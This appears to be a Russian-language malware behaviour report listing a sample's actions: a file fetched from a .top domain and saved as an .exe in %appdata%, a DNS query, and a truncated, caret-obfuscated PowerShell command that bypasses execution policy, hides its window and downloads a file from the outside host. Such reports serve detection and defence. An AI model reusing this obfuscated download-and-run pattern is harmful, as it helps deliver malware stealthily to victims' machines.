Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^wEr^sHeLl.^eX^E^ -E^X^ec^uTi^On^pOliCy ^BYPasS -n^oPROFILe^ -WIn^DoWSt^yLE hI^dDen^ ^(NEw^-ob^jEc^t^ sYst^e^m.N^E^T.We^B^c^LieNt)^.do^WNloa^D^f^iLE^('http://toago...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "pO^wEr^sHeLl.^eX^E^ -E^X^ec^uTi^On^pOliCy ^BYPasS -n^oPROFILe^ -WIn^DoWSt^yLE hI^dDen^ ^(NEw^-ob^jEc^t^ sYst^e^m.N^E^T.We^B^c^LieNt)^.do^WNloa^D^f^iLE^('http://toago...' (со скрытым окном)